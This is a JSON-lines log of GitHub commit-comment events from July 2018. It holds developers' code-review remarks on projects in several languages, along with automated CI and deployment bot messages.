{"id":"7963205357","type":"CommitCommentEvent","actor":{"login":"sunginw"},"repo":{"name":"github/fetch"},"payload":{"comment":{"id":29702346,"position":19,"line":446,"path":"fetch.js","commit_id":"1b56f166a9c2019d7b0fc0a45ad3ee4dde45ddc0","created_at":"2018-07-13T16:42:42Z","updated_at":"2018-07-13T16:42:42Z","author_association":"NONE","body":"ทำไฝ"}},"created_at":"2018-07-13T16:42:42Z"}
{"id":"7963207080","type":"CommitCommentEvent","actor":{"login":"echatav"},"repo":{"name":"rchain/pi4u"},"payload":{"comment":{"id":29702349,"position":null,"line":null,"path":null,"commit_id":"7fc29f05219714af62e61a44d0757892a9876a55","created_at":"2018-07-13T16:43:07Z","updated_at":"2018-07-13T16:43:07Z","author_association":"COLLABORATOR","body":"`T` is the terminal morphism. It may have an associated comprehension but I'm not sure. If `1=P(0)`, then you can think of `T` as some kind of thing..."}},"created_at":"2018-07-13T16:43:07Z"}
{"id":"7963207255","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29702351,"position":15,"line":83,"path":"code/drasil-code/Language/Drasil/CodeSpec.hs","commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-13T16:43:09Z","updated_at":"2018-07-13T16:43:09Z","author_association":"OWNER","body":"I would try instead to generalize the signature of `qtoc` to be constraint-based on its first argument `q` rather than type-based.  If that doesn't work, then I guess `qtoc'` is the fallback position."}},"created_at":"2018-07-13T16:43:09Z"}
{"id":"7963211569","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29702360,"position":null,"line":null,"path":null,"commit_id":"940f43bb1d9b73c054464df8f76bd299c14e7427","created_at":"2018-07-13T16:44:10Z","updated_at":"2018-07-13T16:44:10Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-209](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-209).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-209-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T16:44:10Z"}
{"id":"7963212529","type":"CommitCommentEvent","actor":{"login":"zzzeek"},"repo":{"name":"zzzeek/sqlalchemy"},"payload":{"comment":{"id":29702361,"position":3,"line":3,"path":"doc/build/changelog/unreleased_12/4228.rst","commit_id":"ff2a296291ca7ebc5995592e3f2c6d6f1e6df9ad","created_at":"2018-07-13T16:44:23Z","updated_at":"2018-07-13T16:44:23Z","author_association":"OWNER","body":"ugh, wrong bug number and it was already released..."}},"created_at":"2018-07-13T16:44:23Z"}
{"id":"7963217696","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29702381,"position":null,"line":null,"path":null,"commit_id":"ddf0fdf80a753dc31f3c11d2d863b4f784d9a7b4","created_at":"2018-07-13T16:45:30Z","updated_at":"2018-07-13T16:45:30Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-164529 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-164529\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T16:45:30Z"}
{"id":"7963218721","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"arky/iiab"},"payload":{"comment":{"id":29702382,"position":14,"line":14,"path":"roles/kolibri/tasks/main.yml","commit_id":"3d4721285409b388e5addc57ee26a768df96117f","created_at":"2018-07-13T16:45:43Z","updated_at":"2018-07-13T16:45:43Z","author_association":"NONE","body":"No need to add any service stuff if you install instead through the PPA/DEB, as it sets up a system service for you."}},"created_at":"2018-07-13T16:45:43Z"}
{"id":"7963219118","type":"CommitCommentEvent","actor":{"login":"JosDenmark"},"repo":{"name":"rchain/pi4u"},"payload":{"comment":{"id":29702383,"position":null,"line":null,"path":null,"commit_id":"7fc29f05219714af62e61a44d0757892a9876a55","created_at":"2018-07-13T16:45:48Z","updated_at":"2018-07-13T16:45:48Z","author_association":"COLLABORATOR","body":"> id is sort of hidden in [b|b <- u] which can be translated to [id|b<-u].\r\n\r\nI was going to mention that. That'd make the interpretation `M` easier to grok.\r\n\r\nI think it's also worth clarifying that, e.g., `t : a -> b`, is a term in context. You could have written all of these in the same style that Mike did in the comprehending types paper. `t : a -> b`, e.g., could have been written `[[a.t]]`."}},"created_at":"2018-07-13T16:45:48Z"}
{"id":"7963224038","type":"CommitCommentEvent","actor":{"login":"jbloom22"},"repo":{"name":"hail-is/hail"},"payload":{"comment":{"id":29702395,"position":1,"line":33,"path":"src/main/scala/is/hail/stats/LinearRegressionCombiner.scala","commit_id":"2022face39593eb39a96bd8a17f50ad6d1082ec8","created_at":"2018-07-13T16:46:57Z","updated_at":"2018-07-13T16:46:57Z","author_association":"COLLABORATOR","body":"delete `var x = DenseVector.zeros[Double](k)` above and change to `def merge(y: Double, x: IndexedSeq[Double])`"}},"created_at":"2018-07-13T16:46:57Z"}
{"id":"7963231656","type":"CommitCommentEvent","actor":{"login":"nazpot01"},"repo":{"name":"nazpot01/Spoon-Knife"},"payload":{"comment":{"id":29702413,"position":4,"line":9,"path":"README.md","commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2018-07-13T16:48:40Z","updated_at":"2018-07-13T16:48:40Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-13T16:48:40Z"}
{"id":"7963233034","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29702420,"position":8,"line":9,"path":"src/views/animation.html","commit_id":"99d3a6a3c10dd17e8011402f4b719182b393ef90","created_at":"2018-07-13T16:48:59Z","updated_at":"2018-07-13T16:48:59Z","author_association":"CONTRIBUTOR","body":"用 `window.onload` 的時候注意他和 `$(document).ready` 的意思不同：\r\n\r\n`$(document).ready` 比較類似 `document.addEventListener('DOMContentLoaded', fn)` （超級長 XD）\r\n而 `$(window).load` 才等同 `window.onload` （或 `window.addEventListener('load', fn)` ）"}},"created_at":"2018-07-13T16:48:59Z"}
{"id":"7963233185","type":"CommitCommentEvent","actor":{"login":"jbloom22"},"repo":{"name":"hail-is/hail"},"payload":{"comment":{"id":29702422,"position":1,"line":33,"path":"src/main/scala/is/hail/stats/LinearRegressionCombiner.scala","commit_id":"2022face39593eb39a96bd8a17f50ad6d1082ec8","created_at":"2018-07-13T16:49:01Z","updated_at":"2018-07-13T16:49:01Z","author_association":"COLLABORATOR","body":"oh, I see that you need `x` below. But it can just be an `Array` rather than a `DenseVector`"}},"created_at":"2018-07-13T16:49:01Z"}
{"id":"7963235905","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29702427,"position":null,"line":null,"path":null,"commit_id":"7b1a16f5e8a3e5cff19254bac74cdcfc0a9aaf76","created_at":"2018-07-13T16:49:38Z","updated_at":"2018-07-13T16:49:38Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-209](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-209).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-209-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T16:49:38Z"}
{"id":"7963235968","type":"CommitCommentEvent","actor":{"login":"pablojan"},"repo":{"name":"SwellRT/jetpad"},"payload":{"comment":{"id":29702429,"position":30,"line":26,"path":"src/app/components/pad/pad.component.ts","commit_id":"e7656b66086bb722eaf35fde4b31a315ee8f40da","created_at":"2018-07-13T16:49:39Z","updated_at":"2018-07-13T16:49:39Z","author_association":"CONTRIBUTOR","body":"I did it just to remind me how components are loaded in angular. Feel free to remove them, I will do in next commit anyway. In general I don't show console messages in final code except for fatal tech situations that user shouldn't see :)"}},"created_at":"2018-07-13T16:49:39Z"}
{"id":"7963237521","type":"CommitCommentEvent","actor":{"login":"jamalex"},"repo":{"name":"arky/iiab"},"payload":{"comment":{"id":29702430,"position":9,"line":9,"path":"roles/kolibri/templates/kolibri.service.j2","commit_id":"3d4721285409b388e5addc57ee26a768df96117f","created_at":"2018-07-13T16:50:01Z","updated_at":"2018-07-13T16:50:01Z","author_association":"NONE","body":"One thing we discovered was that if we run it as a separate user, then it's not able to access auto-mounted storage drives over USB. Starting from 0.10, by default we run as the primary user (for a headless device, whichever user gets auto-logged in), so that it can access the drive for easy import/export of content through the UI."}},"created_at":"2018-07-13T16:50:01Z"}
{"id":"7963241549","type":"CommitCommentEvent","actor":{"login":"hotcoder"},"repo":{"name":"spring-projects/spring-kafka"},"payload":{"comment":{"id":29702437,"position":null,"line":null,"path":null,"commit_id":"db0516d786d044cd83237719b8e715be30c05f91","created_at":"2018-07-13T16:50:57Z","updated_at":"2018-07-13T16:50:57Z","author_association":"NONE","body":"@artembilan  , may i know in which cases \r\n\r\n**_org.springframework.kafka.KafkaException Message: Interrupted while queuing ack for ConsumerRecord_**\r\n\r\nwe might get above error ?\r\n\r\nlike in which case thread gets **_Interrupted_**"}},"created_at":"2018-07-13T16:50:57Z"}
{"id":"7963244119","type":"CommitCommentEvent","actor":{"login":"pantheon-upstream"},"repo":{"name":"pantheon-systems/example-drops-8-composer"},"payload":{"comment":{"id":29702440,"position":null,"line":null,"path":null,"commit_id":"7b1e76824cf195aa43470cbbcf752086b5179aea","created_at":"2018-07-13T16:51:34Z","updated_at":"2018-07-13T16:51:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [ci-example-d8-composer#ci-1301](https://dashboard.pantheon.io/sites/c401fd14-f745-4e51-9af2-f30b45146a0c#ci-1301).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1301-ci-example-d8-composer.pantheonsite.io/)"}},"created_at":"2018-07-13T16:51:34Z"}
{"id":"7963244933","type":"CommitCommentEvent","actor":{"login":"jiayingz"},"repo":{"name":"jiayingz/community"},"payload":{"comment":{"id":29702446,"position":54,"line":292,"path":"keps/sig-node/00014-resource-api.md","commit_id":"356acebf1b4e196fa5fff47bb7e7e523e70eaea5","created_at":"2018-07-13T16:51:45Z","updated_at":"2018-07-13T16:51:45Z","author_association":"OWNER","body":"I was thinking `types.UID` here maps ComputeResource name, and keeps it an array fore future group resource support. But agree that could just confuse people and may not even be right format to support group resource. Perhaps simpler to just make it `AllocatedComputeResource map[v1.ResourceName]string` where string maps to ComputeResource name. I guess ComputeResource name doesn't need to follow types.UID constraints since our current design just proposes ComputeResource as a struct field instead of an object."}},"created_at":"2018-07-13T16:51:45Z"}
{"id":"7963247421","type":"CommitCommentEvent","actor":{"login":"turion"},"repo":{"name":"turion/rhine"},"payload":{"comment":{"id":29702449,"position":9,"line":39,"path":"rhine/src/FRP/Rhine/Clock/Realtime/Stdin.hs","commit_id":"416b5c1a02a72297da53bac9c64aafed13e43180","created_at":"2018-07-13T16:52:18Z","updated_at":"2018-07-13T16:52:18Z","author_association":"OWNER","body":"@ggreif not sure... yours is shorter and maybe more efficient, but is it easier to read?"}},"created_at":"2018-07-13T16:52:18Z"}
{"id":"7963247702","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge--Redux"},"payload":{"comment":{"id":29702450,"position":null,"line":null,"path":null,"commit_id":"550aa00642367b000ec8ae05c3eaf5cda9cbe31f","created_at":"2018-07-13T16:52:21Z","updated_at":"2018-07-13T16:52:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GET '/smurfs'](https://trello.com/c/VwMF86aI/3-get-smurfs)"}},"created_at":"2018-07-13T16:52:21Z"}
{"id":"7963250363","type":"CommitCommentEvent","actor":{"login":"micahjohnson150"},"repo":{"name":"USDA-ARS-NWRC/smrf"},"payload":{"comment":{"id":29702456,"position":null,"line":null,"path":null,"commit_id":"99d6bcdbc279218e99dc3f1a18c624e675e08434","created_at":"2018-07-13T16:52:57Z","updated_at":"2018-07-13T16:52:57Z","author_association":"CONTRIBUTOR","body":"fixes #55 "}},"created_at":"2018-07-13T16:52:57Z"}
{"id":"7963250505","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"isaachier/gbemu"},"payload":{"comment":{"id":29702457,"position":40,"line":40,"path":"src/assembler.zig","commit_id":"c02b4b6aa46bd0317d9e92400e27980fb5cc765e","created_at":"2018-07-13T16:52:58Z","updated_at":"2018-07-13T16:52:58Z","author_association":"NONE","body":"If you made this a `switch` instead of an `if`, then once https://github.com/ziglang/zig/issues/769 is implemented, the `return err` here would have an error set that is (correctly) missing `EndOfStream`.\r\n\r\nIt hardly matters since this is just a test, but I thought I'd point out the pattern."}},"created_at":"2018-07-13T16:52:58Z"}
{"id":"7963254847","type":"CommitCommentEvent","actor":{"login":"Thanghand"},"repo":{"name":"pusher/chatkit-android"},"payload":{"comment":{"id":29702465,"position":null,"line":null,"path":null,"commit_id":"613403e06ecc906ea8e26994f6e29e47b5eb6625","created_at":"2018-07-13T16:53:56Z","updated_at":"2018-07-13T16:53:56Z","author_association":"NONE","body":"When you merge it to master branch ^^ ? "}},"created_at":"2018-07-13T16:53:56Z"}
{"id":"7963255582","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29702467,"position":null,"line":null,"path":null,"commit_id":"e130c1654b2efba2935bf73b9c8c94b6c18ef029","created_at":"2018-07-13T16:54:07Z","updated_at":"2018-07-13T16:54:07Z","author_association":"CONTRIBUTOR","body":"Added badge"}},"created_at":"2018-07-13T16:54:07Z"}
{"id":"7963258900","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702474,"position":63,"line":42,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:54:51Z","updated_at":"2018-07-13T16:54:51Z","author_association":"NONE","body":"The `bytes32 pass` here is still the same as the one that needs to be passed with `claimRemittance`. So there is no challenge. Carol can still look at the transaction parameters. Carol does not need to wait for Bob to show up and tell the password."}},"created_at":"2018-07-13T16:54:51Z"}
{"id":"7963261668","type":"CommitCommentEvent","actor":{"login":"kriegste"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29702483,"position":null,"line":null,"path":null,"commit_id":"cac83b12994f5dd06ee4dc168dc0dfb892c7fb46","created_at":"2018-07-13T16:55:25Z","updated_at":"2018-07-13T16:55:25Z","author_association":"NONE","body":"There are some problems with the new os_sprintf implementation.\r\nhttps://github.com/espressif/ESP8266_NONOS_SDK/issues/22#issuecomment-404859152"}},"created_at":"2018-07-13T16:55:25Z"}
{"id":"7963262715","type":"CommitCommentEvent","actor":{"login":"graingert"},"repo":{"name":"github/fetch"},"payload":{"comment":{"id":29702485,"position":19,"line":446,"path":"fetch.js","commit_id":"1b56f166a9c2019d7b0fc0a45ad3ee4dde45ddc0","created_at":"2018-07-13T16:55:39Z","updated_at":"2018-07-13T16:55:39Z","author_association":"NONE","body":"Make a mole?"}},"created_at":"2018-07-13T16:55:39Z"}
{"id":"7963263975","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702487,"position":87,"line":66,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:55:56Z","updated_at":"2018-07-13T16:55:56Z","author_association":"NONE","body":"Not sure why this line is here."}},"created_at":"2018-07-13T16:55:56Z"}
{"id":"7963264582","type":"CommitCommentEvent","actor":{"login":"kubukoz"},"repo":{"name":"kubukoz/sierak"},"payload":{"comment":{"id":29702490,"position":6,"line":24,"path":"src/main/scala/com/kubukoz/sierak/Main.scala","commit_id":"df05601b95aaffa1cad1339b282af01bf8700d43","created_at":"2018-07-13T16:56:04Z","updated_at":"2018-07-13T16:56:04Z","author_association":"OWNER","body":"lmao, I really used ning ws client in an akka-http app"}},"created_at":"2018-07-13T16:56:04Z"}
{"id":"7963265830","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702492,"position":93,"line":72,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:56:21Z","updated_at":"2018-07-13T16:56:21Z","author_association":"NONE","body":"I would prefer to see 2 functions than this `if`."}},"created_at":"2018-07-13T16:56:21Z"}
{"id":"7963269111","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702501,"position":93,"line":72,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:57:06Z","updated_at":"2018-07-13T16:57:06Z","author_association":"NONE","body":"A linear function with `require`s."}},"created_at":"2018-07-13T16:57:06Z"}
{"id":"7963269132","type":"CommitCommentEvent","actor":{"login":"danny0838"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29702502,"position":12,"line":195,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-13T16:57:06Z","updated_at":"2018-07-13T16:57:06Z","author_association":"NONE","body":"這個字符合 Unicode 字形，不應標上 [u]。\r\n![default](https://user-images.githubusercontent.com/531417/42703982-c90534ea-8700-11e8-9113-2d594ccbe268.png)\r\n"}},"created_at":"2018-07-13T16:57:06Z"}
{"id":"7963271396","type":"CommitCommentEvent","actor":{"login":"zigomir"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29702505,"position":null,"line":null,"path":null,"commit_id":"ac7cab37ffdd83fb52c8f8aeb986b60c07b11eb4","created_at":"2018-07-13T16:57:36Z","updated_at":"2018-07-13T16:57:36Z","author_association":"CONTRIBUTOR","body":"How sure you are that it doesn't? Maybe try adding this [package](https://www.npmjs.com/package/webpack-bundle-analyzer) to the webpack build to see what's really being included.\r\n\r\nOtherwise yes, please include those in `default-list` branch. Thanks!"}},"created_at":"2018-07-13T16:57:36Z"}
{"id":"7963272913","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702509,"position":12,"line":9,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:57:57Z","updated_at":"2018-07-13T16:57:57Z","author_association":"NONE","body":"No need to make an ugly sync' call. `accounts` is already given on the line above."}},"created_at":"2018-07-13T16:57:57Z"}
{"id":"7963274837","type":"CommitCommentEvent","actor":{"login":"Dockter"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":29702510,"position":275,"line":457,"path":"src/main/java/com/almuradev/almura/feature/exchange/client/gui/ExchangeScreen.java","commit_id":"a153fb4a8a55afa5c20fd88c00605d4225da5381","created_at":"2018-07-13T16:58:23Z","updated_at":"2018-07-13T16:58:23Z","author_association":"MEMBER","body":"Impressive."}},"created_at":"2018-07-13T16:58:23Z"}
{"id":"7963275014","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702511,"position":15,"line":12,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:58:26Z","updated_at":"2018-07-13T16:58:26Z","author_association":"NONE","body":"`before` means that all `it`s will share and reuse this 1 instance. Not good.\r\nWhat you want is `beforeEach`."}},"created_at":"2018-07-13T16:58:26Z"}
{"id":"7963275836","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702514,"position":25,"line":22,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:58:37Z","updated_at":"2018-07-13T16:58:37Z","author_association":"NONE","body":"What is `xit`?"}},"created_at":"2018-07-13T16:58:37Z"}
{"id":"7963279313","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29702525,"position":37,"line":34,"path":"test/Remittance.js","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-13T16:59:25Z","updated_at":"2018-07-13T16:59:25Z","author_association":"NONE","body":"You did not call `done` if there is an error. If you have an error it means this `it` will time out. Not good.\r\nWhy not return the promise chain and forget about `done`? It would be easier."}},"created_at":"2018-07-13T16:59:25Z"}
{"id":"7963279356","type":"CommitCommentEvent","actor":{"login":"Frommi"},"repo":{"name":"Frommi/miniz_oxide"},"payload":{"comment":{"id":29702526,"position":null,"line":null,"path":null,"commit_id":"a40d7511edc3776fd0fc7fb49611df009db1fa67","created_at":"2018-07-13T16:59:26Z","updated_at":"2018-07-13T16:59:26Z","author_association":"OWNER","body":"I think we need a major one. And there is two other breaking changes that I was thinking of: moving this function pointer callback into c_api and changing it to a closure in miniz_oxide. And changing (Status, in, out) return type to Result<(in, out), status err>. And it would be awesome to add this sink high-level API alongside. And finally write a proper README."}},"created_at":"2018-07-13T16:59:26Z"}
{"id":"7963281899","type":"CommitCommentEvent","actor":{"login":"nazpot01"},"repo":{"name":"nazpot01/Spoon-Knife"},"payload":{"comment":{"id":29702535,"position":null,"line":null,"path":null,"commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2018-07-13T17:00:00Z","updated_at":"2018-07-13T17:00:00Z","author_association":"OWNER","body":"asd"}},"created_at":"2018-07-13T17:00:00Z"}
{"id":"7963284340","type":"CommitCommentEvent","actor":{"login":"artembilan"},"repo":{"name":"spring-projects/spring-kafka"},"payload":{"comment":{"id":29702536,"position":null,"line":null,"path":null,"commit_id":"db0516d786d044cd83237719b8e715be30c05f91","created_at":"2018-07-13T17:00:30Z","updated_at":"2018-07-13T17:00:30Z","author_association":"MEMBER","body":"Well, according your message we end up in this code:\r\n```\r\n\t\tpublic void acknowledge() {\r\n\t\t\t\ttry {\r\n\t\t\t\t\tif (ListenerConsumer.this.autoCommit) {\r\n\t\t\t\t\t\tthrow new IllegalStateException(\"Manual acks are not allowed when auto commit is used\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\tListenerConsumer.this.acks.put(this.record);\r\n\t\t\t\t}\r\n\t\t\t\tcatch (InterruptedException e) {\r\n\t\t\t\t\tThread.currentThread().interrupt();\r\n\t\t\t\t\tthrow new KafkaException(\"Interrupted while queuing ack for \" + this.record, e);\r\n\t\t\t\t}\r\n\t\t\t\tif (this.immediate) {\r\n\t\t\t\t\tListenerConsumer.this.consumer.wakeup();\r\n\t\t\t\t}\r\n\t\t\t}\r\n```\r\n\r\nSo, the `acknowledge()` is called from the interrupted thread.\r\n\r\nThat is a story about your own thread and you should reconsider your logic do not attempt to ack from the interrupted thread.\r\n\r\nThere is no any place in the Framework to call  `acknowledge()`  automatically."}},"created_at":"2018-07-13T17:00:30Z"}
{"id":"7963285322","type":"CommitCommentEvent","actor":{"login":"JosDenmark"},"repo":{"name":"rchain/pi4u"},"payload":{"comment":{"id":29702538,"position":null,"line":null,"path":null,"commit_id":"7fc29f05219714af62e61a44d0757892a9876a55","created_at":"2018-07-13T17:00:42Z","updated_at":"2018-07-13T17:00:42Z","author_association":"COLLABORATOR","body":"Also, I guess `T` would then be the interpretation of the term `*` in context with `a`, so `[[a.*]]`."}},"created_at":"2018-07-13T17:00:42Z"}
{"id":"7963286975","type":"CommitCommentEvent","actor":{"login":"gentlegiantJGC"},"repo":{"name":"Podshot/MCEdit-Unified"},"payload":{"comment":{"id":29702543,"position":80,"line":1903,"path":"pymclevel/leveldbpocket.py","commit_id":"572bd64e61441887af0dcc83b0bcfdef1bfdbfc0","created_at":"2018-07-13T17:01:04Z","updated_at":"2018-07-13T17:01:04Z","author_association":"CONTRIBUTOR","body":"debug comment needed? Will break things if it is not defined"}},"created_at":"2018-07-13T17:01:04Z"}
{"id":"7963290641","type":"CommitCommentEvent","actor":{"login":"danny0838"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29702549,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-13T17:01:53Z","updated_at":"2018-07-13T17:01:53Z","author_association":"NONE","body":"這個符合 Unicode 收錄字形，不應標 [u]：\r\n\r\n![default](https://user-images.githubusercontent.com/531417/42704039-f63d8fa2-8700-11e8-8bbf-02d833a3a6e0.png)\r\n\r\n（「㐬」末筆彎勾作「山」，上挑視作「山」的變形，彎而不勾作「女」。圖中 U源彎而不勾、G源上挑、T源彎而不勾，因此「山」和「女」皆符合）"}},"created_at":"2018-07-13T17:01:53Z"}
{"id":"7963291707","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29702552,"position":null,"line":null,"path":null,"commit_id":"6233b98d0e355c5eb54f95954ee771068becb164","created_at":"2018-07-13T17:02:08Z","updated_at":"2018-07-13T17:02:08Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.08 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `nodes_count`      |    29    |\n| `texts_passing`    |     1    |\n| `texts_total`      |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |     +242 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0035/__cts__.xml`                            | New      |\n| `./data/tlg0035/tlg001/__cts__.xml`                     | New      |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0035/__cts__.xml`                            | Passing  |\n| `./data/tlg0035/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4447)*\n"}},"created_at":"2018-07-13T17:02:08Z"}
{"id":"7963294243","type":"CommitCommentEvent","actor":{"login":"gkostin1966"},"repo":{"name":"mlibrary/turnsole"},"payload":{"comment":{"id":29702554,"position":null,"line":null,"path":null,"commit_id":"97348da2e52a462613a58137e9ac29a12a25980a","created_at":"2018-07-13T17:02:42Z","updated_at":"2018-07-13T17:02:42Z","author_association":"COLLABORATOR","body":"Cut and paste error.  Removed unreferenced variables."}},"created_at":"2018-07-13T17:02:42Z"}
{"id":"7963300729","type":"CommitCommentEvent","actor":{"login":"sabrinaprice"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29702569,"position":null,"line":null,"path":null,"commit_id":"1a5bece916ac296b05e72256e883bf5ec91ffc3c","created_at":"2018-07-13T17:04:13Z","updated_at":"2018-07-13T17:04:13Z","author_association":"NONE","body":"Yes"}},"created_at":"2018-07-13T17:04:13Z"}
{"id":"7963305786","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29702593,"position":null,"line":null,"path":null,"commit_id":"cc5f7c55396e71e71df3252eea9eb7c4ca0b6b01","created_at":"2018-07-13T17:05:24Z","updated_at":"2018-07-13T17:05:24Z","author_association":"NONE","body":"## Global\n\n| Changed       |   Status |\n|:--------------|---------:|\n| `coverage`    |     0.03 |\n| `texts_total` |    -1    |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4448)*\n"}},"created_at":"2018-07-13T17:05:24Z"}
{"id":"7963305969","type":"CommitCommentEvent","actor":{"login":"crdsTeamCity"},"repo":{"name":"crdschurch/crds-styleguide"},"payload":{"comment":{"id":29702595,"position":null,"line":null,"path":null,"commit_id":"fd256acbcea6786cf5ef38db1b451311627dcec4","created_at":"2018-07-13T17:05:26Z","updated_at":"2018-07-13T17:05:26Z","author_association":"NONE","body":"TeamCity Code / 1. Development / DDK / Feature [Build 600](https://ci.crossroads.net/viewLog.html?buildId=54240&buildTypeId=Code_Development_Ddk_Feature) is now running\n"}},"created_at":"2018-07-13T17:05:26Z"}
